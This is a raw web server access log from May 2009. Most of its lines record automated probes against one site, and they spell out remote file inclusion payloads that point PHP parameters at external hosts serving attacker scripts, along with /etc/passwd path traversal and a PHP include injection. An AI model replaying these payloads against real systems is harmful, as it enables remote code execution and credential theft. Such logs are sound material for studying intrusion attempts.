211.110.19.178 - - [19/May/2009:09:21:54 -0700] "GET //vwar/backup/errors.php?error=http://www.tkcchoir.org/xml/roxx.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.110.19.178 - - [19/May/2009:09:21:54 -0700] "GET /logs///vwar/backup/errors.php?error=http://www.tkcchoir.org/xml/roxx.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.110.19.178 - - [19/May/2009:09:22:02 -0700] "GET /logs/access_080827.log///vwar/backup/errors.php?error=http://www.tkcchoir.org/xml/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.110.19.178 - - [19/May/2009:09:22:02 -0700] "GET //vwar/backup/errors.php?error=http://www.tkcchoir.org/xml/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.110.19.178 - - [19/May/2009:09:22:02 -0700] "GET /logs///vwar/backup/errors.php?error=http://www.tkcchoir.org/xml/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.118.156.242 - - [19/May/2009:09:22:03 -0700] "GET /logs/access_080801.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sez.by/assets/images/uslugi/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.110.19.178 - - [19/May/2009:09:22:11 -0700] "GET /logs/access_090210.log///vwar/backup/errors.php?error=http://www.tkcchoir.org/xml/roxx.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.1.154.24 - - [19/May/2009:09:22:13 -0700] "GET /logs/access_080131.log//index.php?pagina=http://www.graal-plus.zp.ua//images/super-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.110.19.178 - - [19/May/2009:09:22:23 -0700] "GET /logs/access_090210.log///vwar/backup/errors.php?error=http://www.tkcchoir.org/xml/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
122.153.212.195 - - [19/May/2009:09:22:26 -0700] "GET /logs/access_080331.log//?_zb_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.153.212.195 - - [19/May/2009:09:22:26 -0700] "GET /logs//?_zb_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 200 100196 "-" "Mozilla/5.0" "www.dmulk.com"
122.153.212.195 - - [19/May/2009:09:22:37 -0700] "GET /logs/access_080411.log//?_zb_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.214.29.137 - - [19/May/2009:09:22:38 -0700] "GET /logs/access_081125.log//horde/services/help/?show=about&module=;%22.include(%27http:%27.chr(47).chr(47).%27x.beatz.in%27.chr(47).%27sp%27.chr(47).%27tc.txt%27); HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [19/May/2009:09:22:38 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
85.214.29.137 - - [19/May/2009:09:22:42 -0700] "GET /logs/access_081125.log//horde/services/help/?show=about&module=;%22.include(%27http:%27.chr(47).chr(47).%27x.beatz.in%27.chr(47).%27sp%27.chr(47).%27tc.txt%27); HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.248.128.84 - - [19/May/2009:09:22:51 -0700] "GET /logs/access_080809.log//modules/vwar/admin/admin.php?vwar_root=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.157.4.43 - - [19/May/2009:09:22:53 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
122.153.212.195 - - [19/May/2009:09:22:55 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.153.212.195 - - [19/May/2009:09:22:55 -0700] "GET /logs/access_080821.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.153.212.195 - - [19/May/2009:09:22:55 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.153.212.195 - - [19/May/2009:09:23:17 -0700] "GET /?_zb_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 200 42081 "-" "Mozilla/5.0" "www.dmulk.com"
91.206.183.148 - - [19/May/2009:09:23:45 -0700] "GET /logs/access_080612.log//errors.php?error=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.206.183.148 - - [19/May/2009:09:23:49 -0700] "GET /logs/access_081101.log//errors.php?error=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.153.212.195 - - [19/May/2009:09:24:05 -0700] "GET /logs/access_080621.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
151.1.154.24 - - [19/May/2009:09:24:10 -0700] "GET /logs/access_080131.log//index.php?pagina=http://www.graal-plus.zp.ua//images/super-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.54.76.10 - - [19/May/2009:09:24:10 -0700] "GET /logs/access_080823.log//joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.54.76.10 - - [19/May/2009:09:24:11 -0700] "GET /logs/access_080823.log//joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.210.221 - - [19/May/2009:09:24:19 -0700] "GET /logs/access_090126.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.nw.or.kr/bbs/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.210.221 - - [19/May/2009:09:24:23 -0700] "GET /logs/access_080427.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.nw.or.kr/bbs/icon/id.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.248.128.84 - - [19/May/2009:09:24:24 -0700] "GET /logs/access_090204.log//modules/vwar/admin/admin.php?vwar_root=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.217.216.86 - - [19/May/2009:09:24:31 -0700] "GET /logs/access_081017.log//stubjambo.php?baseDir=http://sez.by/assets/images/uslugi/office1.jpg??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.217.216.86 - - [19/May/2009:09:24:31 -0700] "GET /stubjambo.php?baseDir=http://sez.by/assets/images/uslugi/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.217.216.86 - - [19/May/2009:09:24:31 -0700] "GET /logs//stubjambo.php?baseDir=http://sez.by/assets/images/uslugi/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.217.216.86 - - [19/May/2009:09:24:35 -0700] "GET /logs/access_090124.log//stubjambo.php?baseDir=http://sez.by/assets/images/uslugi/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.108.64.88 - - [19/May/2009:09:25:00 -0700] "GET /logs/access_081021.log///?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/data/log.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.157.4.42 - - [19/May/2009:09:25:04 -0700] "HEAD /blog/wp-cron.php?check=0e2d9f8f249ca15a02717d213606e9a2 HTTP/1.0" 200 0 "-" "WordPress/2.7.1" "dmulk.com"
89.108.64.88 - - [19/May/2009:09:25:06 -0700] "GET /logs/access_081021.log///?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/data/log.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.64.88 - - [19/May/2009:09:25:06 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/data/log.txt? HTTP/1.1" 200 100197 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.64.88 - - [19/May/2009:09:25:12 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/data/log.txt? HTTP/1.1" 200 100197 "-" "libwww-perl/5.812" "www.dmulk.com"
190.144.44.36 - - [19/May/2009:09:25:13 -0700] "GET /logs/access_071214.log//?_zb_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [19/May/2009:09:25:13 -0700] "GET /?_zb_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 200 42054 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [19/May/2009:09:25:13 -0700] "GET /logs//?_zb_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 200 100196 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.210.221 - - [19/May/2009:09:25:17 -0700] "GET /logs/access_090123.log//contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://www.nw.or.kr/bbs/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.30.79.60 - - [19/May/2009:09:25:22 -0700] "GET /logs/access_090201.log HTTP/1.0" 200 3082426 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
202.60.64.14 - - [19/May/2009:09:25:24 -0700] "GET /logs/access_090318.log%20%20//shop/main.php?_shop_path=http://sez.by/assets/images/uslugi/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [19/May/2009:09:25:28 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
64.157.4.43 - - [19/May/2009:09:25:30 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
64.157.4.42 - - [19/May/2009:09:25:43 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
64.157.4.43 - - [19/May/2009:09:25:45 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
122.153.212.195 - - [19/May/2009:09:26:00 -0700] "GET /logs/access_080821.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.108.64.88 - - [19/May/2009:09:26:01 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/data/log.txt? HTTP/1.1" 500 292 "-" "libwww-perl/5.812" "www.dmulk.com"
190.144.44.36 - - [19/May/2009:09:26:02 -0700] "GET /logs/access_080425.log//?_zb_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.108.64.88 - - [19/May/2009:09:26:10 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/data/log.txt? HTTP/1.1" 200 42074 "-" "libwww-perl/5.812" "www.dmulk.com"
122.153.212.195 - - [19/May/2009:09:26:11 -0700] "GET /logs/access_080621.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.38.181.51 - - [19/May/2009:09:26:17 -0700] "GET /logs/access_081012.log//index.php?DOCUMENT_ROOT=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.38.181.51 - - [19/May/2009:09:26:17 -0700] "GET /logs/access_080906.log//index.php?DOCUMENT_ROOT=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.38.181.51 - - [19/May/2009:09:26:17 -0700] "GET /logs//index.php?DOCUMENT_ROOT=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.157.4.42 - - [19/May/2009:09:26:18 -0700] "HEAD /blog/wp-cron.php?check=0e2d9f8f249ca15a02717d213606e9a2 HTTP/1.0" 200 0 "-" "WordPress/2.7.1" "dmulk.com"
217.18.76.16 - - [19/May/2009:09:26:20 -0700] "GET /logs/access_080410.log//agendax/addevent.inc.php?agendax_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.18.76.16 - - [19/May/2009:09:26:20 -0700] "GET /agendax/addevent.inc.php?agendax_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.18.76.16 - - [19/May/2009:09:26:21 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.157.4.42 - - [19/May/2009:09:26:33 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
69.237.82.158 - - [19/May/2009:09:26:36 -0700] "GET /logs/access_080612.log//errors.php?error=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.237.82.158 - - [19/May/2009:09:26:46 -0700] "GET /logs/access_081101.log//errors.php?error=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [19/May/2009:09:26:47 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
78.143.46.123 - - [19/May/2009:09:26:52 -0700] "GET /components/com_virtuemart/errors.php?error=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
78.143.46.123 - - [19/May/2009:09:26:53 -0700] "GET /logs//components/com_virtuemart/errors.php?error=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
78.143.46.123 - - [19/May/2009:09:26:53 -0700] "GET /logs/access_090502.log//components/com_virtuemart/errors.php?error=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.52.230.168 - - [19/May/2009:09:26:56 -0700] "GET /joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.52.230.168 - - [19/May/2009:09:26:56 -0700] "GET /logs//joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.52.230.168 - - [19/May/2009:09:27:03 -0700] "GET /logs/access_080619.log//joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.52.230.168 - - [19/May/2009:09:27:03 -0700] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.217.216.86 - - [19/May/2009:09:27:04 -0700] "GET /logs/access_081017.log%20%20//stubjambo.php?baseDir=http://sez.by/assets/images/uslugi/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.52.230.168 - - [19/May/2009:09:27:04 -0700] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.52.230.168 - - [19/May/2009:09:27:04 -0700] "GET /logs/access_090407.log/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.217.216.86 - - [19/May/2009:09:27:04 -0700] "GET /logs/access_090124.log%20%20//stubjambo.php?baseDir=http://sez.by/assets/images/uslugi/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.52.230.168 - - [19/May/2009:09:27:11 -0700] "GET /logs/access_080925.log//joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.153.212.195 - - [19/May/2009:09:27:12 -0700] "GET /logs/access_080331.log%20%20//?_zb_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.19.228.18 - - [19/May/2009:09:27:12 -0700] "GET /logs/access_080925.log//import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.228.18 - - [19/May/2009:09:27:12 -0700] "GET /import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.228.18 - - [19/May/2009:09:27:12 -0700] "GET /logs//import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
122.153.212.195 - - [19/May/2009:09:27:13 -0700] "GET /logs/access_080411.log%20%20//?_zb_path=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.19.228.18 - - [19/May/2009:09:27:13 -0700] "GET /logs/access_080619.log//import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.38.181.51 - - [19/May/2009:09:27:14 -0700] "GET /index.php?DOCUMENT_ROOT=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 41968 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.228.18 - - [19/May/2009:09:27:16 -0700] "GET /logs/access_080619.log//import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.228.18 - - [19/May/2009:09:27:16 -0700] "GET /logs/access_080925.log//import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
78.143.46.123 - - [19/May/2009:09:27:17 -0700] "GET /components/com_virtuemart/errors.php?error=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.19.228.18 - - [19/May/2009:09:27:17 -0700] "GET /logs//import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
78.143.46.123 - - [19/May/2009:09:27:17 -0700] "GET /logs//components/com_virtuemart/errors.php?error=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.19.228.18 - - [19/May/2009:09:27:17 -0700] "GET /import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
78.143.46.123 - - [19/May/2009:09:27:17 -0700] "GET /logs/access_090405.log//components/com_virtuemart/errors.php?error=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.52.230.168 - - [19/May/2009:09:27:19 -0700] "GET /logs//joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.52.230.168 - - [19/May/2009:09:27:19 -0700] "GET /logs/access_090407.log//joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.52.230.168 - - [19/May/2009:09:27:19 -0700] "GET /joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.191.103.144 - - [19/May/2009:09:27:28 -0700] "GET /logs/access_090407.log/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.191.103.144 - - [19/May/2009:09:27:28 -0700] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.191.103.144 - - [19/May/2009:09:27:28 -0700] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.52.230.168 - - [19/May/2009:09:27:31 -0700] "GET /logs/access_090506.log/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
78.143.46.123 - - [19/May/2009:09:27:34 -0700] "GET /logs/access.log//components/com_virtuemart/errors.php?error=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
78.143.46.123 - - [19/May/2009:09:27:36 -0700] "GET /logs/access_090507.log//components/com_virtuemart/errors.php?error=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.191.103.144 - - [19/May/2009:09:27:36 -0700] "GET /logs/access_090506.log/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.52.230.168 - - [19/May/2009:09:27:40 -0700] "GET /logs/access_090506.log//joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
110.45.145.92 - - [19/May/2009:09:27:42 -0700] "GET /logs/access_081027.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.jigangdoyo.com/web_logs/iyoshells/CMD.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
110.45.145.92 - - [19/May/2009:09:27:42 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.jigangdoyo.com/web_logs/iyoshells/CMD.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
110.45.145.92 - - [19/May/2009:09:27:42 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.jigangdoyo.com/web_logs/iyoshells/CMD.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.191.103.144 - - [19/May/2009:09:27:43 -0700] "GET /logs/access_090407.log//joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.191.103.144 - - [19/May/2009:09:27:43 -0700] "GET /joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.191.103.144 - - [19/May/2009:09:27:43 -0700] "GET /logs//joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
110.45.145.92 - - [19/May/2009:09:27:47 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jigangdoyo.com/web_logs/iyoshells/CMD.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
110.45.145.92 - - [19/May/2009:09:27:47 -0700] "GET /logs/access_080921.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jigangdoyo.com/web_logs/iyoshells/CMD.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
110.45.145.92 - - [19/May/2009:09:27:47 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jigangdoyo.com/web_logs/iyoshells/CMD.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
110.45.145.92 - - [19/May/2009:09:27:47 -0700] "GET /logs/access_080803.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jigangdoyo.com/web_logs/iyoshells/CMD.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.191.103.144 - - [19/May/2009:09:27:51 -0700] "GET /logs/access_090506.log//joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
110.45.145.92 - - [19/May/2009:09:27:55 -0700] "GET /logs/access_081107.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.jigangdoyo.com/web_logs/iyoshells/CMD.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.18.76.16 - - [19/May/2009:09:28:00 -0700] "GET /logs/access_080420.log//agendax/addevent.inc.php?agendax_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.106.131 - - [19/May/2009:09:28:03 -0700] "GET /robots.txt HTTP/1.1" 200 36 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
202.60.64.14 - - [19/May/2009:09:28:14 -0700] "GET /logs/access_090415.log%20%20//shop/main.php?_shop_path=http://sez.by/assets/images/uslugi/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.248.128.84 - - [19/May/2009:09:28:24 -0700] "GET /logs/access_080902.log//modules/vwar/admin/admin.php?vwar_root=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.191.103.144 - - [19/May/2009:09:28:51 -0700] "GET /logs//joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
